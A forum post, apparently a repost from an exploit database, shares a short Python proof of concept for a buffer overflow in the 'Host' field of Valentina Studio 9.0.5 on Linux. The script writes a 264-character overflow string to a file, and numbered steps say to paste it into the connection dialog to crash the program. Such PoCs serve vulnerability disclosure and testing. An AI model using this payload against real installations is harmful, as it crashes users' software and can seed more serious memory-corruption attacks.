cnhackteam7 Posted November 8, 2022 Group: Members Content Count: 411 Achievement Points: 2,550 With Us For: 138 Days Status: Offline Last Seen: November 22, 2022 Device: Windows Share Posted November 8, 2022 # -*- coding: utf-8 -*- # Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC) # Date: 20/02/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://valentina-db.com/en/ # Software Link: https://www.valentina-db.com/en/all-downloads/vstudio/current/vstudio_x64_lin-deb?format=raw # Version: 9.0.5 # Tested on: Linux kali amd64 # Proof of Concept: # 1.- Run the python script "vstudio.py", it will create a new file "vstudio.txt" # 2.- Copy the text from the generated vstudio.txt file to clipboard # 3.- Open VStudio # 4.- Go to File > Connect to... # 5.- Click on Valentina Server or SQLite Server # 6.- Paste clipboard in 'Host' field # 7.- Click on button -> Connect # 8.- Crashed buffer = "\x41" * 264 f = open ("vstudio.txt", "w") f.write(buffer) f.close() Link to comment Share on other sites More sharing options...
Recommended Posts